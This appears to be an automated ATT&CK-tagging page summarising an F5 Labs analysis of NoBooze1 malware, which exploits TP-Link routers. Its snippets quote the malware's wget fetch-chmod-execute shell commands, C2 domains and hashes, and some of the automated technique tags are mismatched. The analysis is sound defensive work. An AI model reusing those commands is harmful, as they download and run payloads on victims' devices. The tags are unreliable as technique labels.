TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

NoBooze1 Malware Targets TP-Link Routers via CVE-2019-9082

2025-07-16

ATT&CK techniques detected

17 predictions
T1027.002 Software Packing (99%)
“…f95eb5c3a77380e8a6205add1aff59d xle1 c9befe591df01c4dbe700deb855e9424e18d2195 xale1 Inspecting the NoBooze1 malware x86-64 binary “xale1”. F5 Labs focused attention on the “xale1” binary for further analysis – purely due to familiarity with the x64 architecture. The binary…”
T1027 Obfuscated Files or Information (94%)
“…initial binary by renaming itself to a random four-letter filename and then deleting the newly renamed file. Finally, the memory segment is marked as protected and executable, and the unpacked code is executed (see Figure 4). Perhaps unsurprisingly, the unpacked code is actuall…”
T1190 Exploit Public-Facing Application (91%)
“…distinct families of exploit payloads remain, shown in Figure 1 in descending order of targeting volume. For the remainder of the analysis, we will be focusing on “exploit_family_1” (top right) which delivers malware we’ve named NoBooze1 after its x64 binary “xale1”. …”
T1055.001 Dynamic-link Library Injection (88%)
“…’s entry point. Conveniently, the unpacker does not defeat debugging with gdb within a VM sandbox. This means that break-pointing right before the jump to the unpacked code allows for a capture of the process’s memory, which in turn comfortably enables further binary analysi…”
T1190 Exploit Public-Facing Application (86%)
“NoBooze1 Malware Targets TP-Link Routers via CVE-2019-9082. The Sensor Intel Series is created in partnership with Efflux, who maintains a globally distributed network of sensors from which we derive attack telemetry. Additional insights and contributions provided by the F5 …”
T1190 Exploit Public-Facing Application (83%)
“Note that the first stage one URL shares infrastructure with the TP-Link targeting. The consistent exploit payload behavior and shared infrastructure indicate that exploitation targeting Raisecom web interfaces is being conducted by the same actor targeting TP-Link routers. W…”
T1190 Exploit Public-Facing Application (80%)
“It seems unlikely that vulnerable TP-Link routers support such a diverse range of architectures (see Listing 2). This in turn suggests the possibility that the malware may be intended for general, wider, usage and that the malware may have been authored by someone other than …”
T1190 Exploit Public-Facing Application (80%)
“…injection via a country query parameter in TP-Link’s proprietary extension to the LuCI OpenWrt configuration interface¹ (not affiliated with TP-Link). The lack of input sanitization leads to remote code execution (RCE), presumably through embedding the parameter in an o…”
T1190 Exploit Public-Facing Application (59%)
“…21) targeting is on the rise – we will dig into this activity in the next section. CVE-2020-8958 (Guangzhou ONU) halved activity, along with CVE-2019-9082 (ThinkPHP) and CVE-2020-11625 (AvertX camera). CVE-2025-31324 (SAP NetWeaver) appears in the top 1…”
T1055.001 Dynamic-link Library Injection (58%)
“…harder to author. However, the malware author goes out of their way to make writing a signature straightforward by including the string “twinks :3” in plain text (which is printed to stdout when the binary exits). Figure 3: An overview of the xale1 binary. The yellow are…”
T1190 Exploit Public-Facing Application (56%)
“…rf %s/nkc%s; - busybox wget %s/meow/nk%s -o %s/nkd%s; chmod 777 %s/nkd%s; %s/nkd%s %s; rm -rf %s/nkd%s; - rm -rf wget-lo* NoBooze1 RAT-like shell commands. The unpacked binary contains a large vocabulary of shell commands (e.g. scp, …”
T1027 Obfuscated Files or Information (54%)
“…GNU/Linux), statically linked, no section header. xale1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header. Listing 3: 71db668e79827f43f6ba4bd0997613f33f686094 a5le1 9ddd04fb260073640d8ac8b795a61295c3506df6 a7le1 a2ae7d4777351c012d09…”
T1588.006 Vulnerabilities (50%)
“…) has established a moderate upward trend (remember that the y-axis here is logarithmic scale). CVE-2024-7120 (Raisecom, bottom right) is seeing an uptick in targeting, from the same threat actor targeting TP-Link routers with NoBooze1 malware, and time will tell if ta…”
T1059.004 Unix Shell (50%)
“…initially manually connecting to this URL over HTTP, the following shell commands are run (where %s are C string format parameters supplied at runtime): - rm -rf %s/nk*; - rm %s/nk*; - wget -q http://%s/meow/nk%s -o %s/nka%s; chmod 777 %s/nka…”
T1071 Application Layer Protocol (44%)
“…8 (Google’s primary DNS) - 8.8.4.4 (Google’s secondary DNS). Suspected C2 server domains: - cross-compiling[.]org (suspended by DNS registrar, PDR Ltd) - i-kiss-boys[.]com (AS14956 RouterHosting LLC) - furry-femboys[.]top (AS14956 - RouterHosting …”
T1572 Protocol Tunneling (37%)
“…aaed80/. - Launch gdb for xale1. - Verify 0x008175a9 is the expected jump instruction (jmp r13 – opcode 41ffe5). - Breakpoint at 0x008175a9. - Run to the breakpoint. - Introspect /proc/pid/maps and capture the first segment with memory protection flags r-xp (e.g. us…”
T1105 Ingress Tool Transfer (35%)
“…8 (Google’s primary DNS) - 8.8.4.4 (Google’s secondary DNS). Suspected C2 server domains: - cross-compiling[.]org (suspended by DNS registrar, PDR Ltd) - i-kiss-boys[.]com (AS14956 RouterHosting LLC) - furry-femboys[.]top (AS14956 - RouterHosting …”

Summary

Sensor Intel Series: July 2025 CVE Trends